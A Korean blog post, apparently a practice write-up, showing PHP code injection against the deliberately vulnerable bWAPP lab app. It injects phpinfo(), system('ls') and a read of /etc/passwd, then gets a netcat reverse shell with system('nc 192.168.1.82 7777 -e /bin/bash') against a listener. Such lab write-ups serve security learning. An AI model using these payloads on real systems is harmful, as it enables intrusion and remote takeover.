owasp 실습(bwapp)-7 (php code injection) + netcat(리버스 쉘)

2020. 12. 8. 15:24·Web hacking

 

 

 

 

 

 

message를 클릭했을때 주소창이뜨는것을 보고

 

 

 

 

 

 

http://192.168.1.75/bwAPP/phpi.php?message=phpinfo()

php info를 넣어본다

 

 

 

 

 

php 명령어 : php info()

os (리눅스 명령어) : system("ls")

 

 

 

 

 

 

 

 

 

http://192.168.1.75/bwAPP/phpi.php?message=cat /etc/passwd

 

 

 

 

 

 

 

=---------------------------

 

 

 

 

netcat

 

php code injection 을 이용한 리버스쉘

 

서버 -> 클라이언트로 접속해서 클라이언트에서 쉘을 얻는 것.

 

-------------------------------------

 

cmd(윈도우)

nc -lvp 7777

 

 

 

 

system("nc 윈도우아이피 7777 -e /bin/bash")

 

system("nc 192.168.1.82 7777 -e /bin/bash")

 

주입

 

 

 

 

 

 

 

 

 배쉬쉘 실행하기.

 

cmd(윈도우) -리스닝 진행

             nc -lvp 7777

         

 

beebox) -

              system("nc 192.168.1.82 7777 -e /bin/bash")

 

 

 

 

성공하엿다

 

 

결론-------

 

윈도우(cmd)   리스닝 진행후 

beebox)         php code injection을 이용해 리버스쉘 진행구문 삽입

 

 

 

 

윈도우 -> beebox 접속하면

윈도우에서 리스닝하고 접속한뒤 명령어를 치기떄문에

클라이언트가 윈도우가되고

 

서버인 비박스의 명령어를 칠수있게된다.

 

리버스쉘 성공

'Web hacking' 카테고리의 다른 글

owasp 실습(bwapp) -9 (Unrestricted File Upload -medium)  (0) 2020.12.08
owasp 실습(bwapp)-8 (Remote & Local File Inclusion (RFI/LFI)) 서버 다운로드 취약점  (0) 2020.12.08
owasp 실습(bwapp)-6 (OS Command Injection) + netcat(리버스 쉘)  (0) 2020.12.08
owasp 실습(bwapp)-5 (SQL Injection - Stored (Blog))  (0) 2020.12.08
owasp 실습(bwapp)-4 (XML/XPath Injection (Login Form)  (0) 2020.12.08
'Web hacking' 카테고리의 다른 글
  • owasp 실습(bwapp) -9 (Unrestricted File Upload -medium)
  • owasp 실습(bwapp)-8 (Remote & Local File Inclusion (RFI/LFI)) 서버 다운로드 취약점
  • owasp 실습(bwapp)-6 (OS Command Injection) + netcat(리버스 쉘)
  • owasp 실습(bwapp)-5 (SQL Injection - Stored (Blog))
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    owasp 실습(bwapp)-7 (php code injection) + netcat(리버스 쉘)
    상단으로

    티스토리툴바